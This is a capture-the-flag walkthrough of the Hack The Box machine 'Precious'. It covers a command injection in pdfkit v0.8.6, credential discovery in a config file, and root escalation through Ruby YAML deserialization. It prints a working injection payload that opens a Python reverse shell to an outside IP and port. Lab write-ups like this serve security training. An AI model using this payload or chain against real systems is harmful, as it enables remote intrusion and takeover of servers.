search

HTB Machine Precious

Port scaning with nmap

  • port 80 is open : redirect to http://precious.htb/

add this to /etc/hosts

On this page we have Convert Web Page to PDF functionality

image

after giving url pdf file is downloaded

using exiftool on pdf we know that it is Generated by pdfkit v0.8.6

This version is vulnerable to RCE

Payload:

http://%20`{command}`

we can use this to get reverse shell

http://%20`python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.40",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'`

references: https://www.revshells.com/

we get shell as user ruby

image

we can see two user in /home directory

image

user flag is in directory of user henry but it is not accessible.

inside the directory of user ruby there is config file in .bundle in this file we can see password of user henry

image

we can use this for ssh to henry

user can run /opt/update_dependencies.rb as root with sudo

image

this file is not writable. looking at code we see it use YAML.load, which is vulnerable to deserialization attack.

image

we can write in dependencies.yml

payload:

reference: https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565#file-ruby_yaml_load_sploit2-yaml

now we can run this with sudo and get the root flag sudo /usr/bin/ruby /opt/update_dependencies.rb

This give root flag.

:octocat: Happy Hacking :octocat:

PreviousHTB MachinesNextHTB Machine Stocker

Last updated